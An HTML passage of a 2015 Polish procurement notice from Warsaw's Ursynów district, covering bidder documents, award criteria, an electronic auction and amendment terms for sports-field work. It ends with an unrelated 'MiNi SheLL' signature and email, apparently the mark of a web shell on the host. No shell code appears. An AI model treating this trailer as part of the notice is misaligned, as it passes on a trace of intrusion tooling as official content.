</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1).1. Dowodami o których mowa w pkt III.4.1) Ogłoszenia są:
a) poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a). 
Ww. dokument musi zawierać przyczyny braku możliwości uzyskania poświadczenia.
2. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszej uwadze.
3. Pod pojęciem głównych usług Zamawiający rozumie usługi potwierdzające spełnianie warunku udziału w postępowaniu, o którym mowa w pkt. III. 3.2) Ogłoszenia. Zamawiający uzna za wystarczające wskazanie w Wykazie wykonanych lub wykonywanych głównych usług i załączenie dowodów w liczbie potwierdzającej spełnianie warunku udziału w postępowaniu.

III.6.2)  W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu,  potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych - innego/ych podmiotu/ów, niezależnie od charakteru prawnego łączących go z nim/i stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Dokument ten powinien w szczególności zawierać następujące informacje:
a) zakres dostępnych wykonawcy zasobów innego podmiotu;
b) sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia;
c) charakter stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

Wzór zobowiązania stanowi załącznik nr 7 do SIWZ.

Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy PZP, odpowiada solidarnie z Wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.

III.6.3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - czas podjęcia działań interwencyjnych w zakresie prac objętych przedmiotem zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
 http://aukcje.um.warszawa.pl</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
1.	Planowanej ilości prac, z zastrzeżeniem, iż nie może zostać przekroczona maksymalna cena ofertowa brutto.
2.	Planowanej krotności prac, z zastrzeżeniem, iż nie może zostać przekroczona łączna maksymalna cena ofertowa brutto.
3.	Terminu realizacji (skrócenia), w sytuacji gdy w terminie wcześniejszym niż 15.12.2016 r. zostaną wyczerpane środki finansowe, o których mowa w § 4 ust. 1 wzoru umowy.
4.	Zmniejszenia wynagrodzenia z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy lub z powodu rezygnacji z wykonania części zamówienia.
5.	Zakresu prac, szczególnie w przypadku opadów śniegu lub innych zjawisk  pogodowych przez które boiska nie będą mogły być wykorzystywane lub będą wyłączone z użytku (zamknięte)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 334.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2015 godzina 12:30, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ SPORTU I REKREACJI, POK. NR 551.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com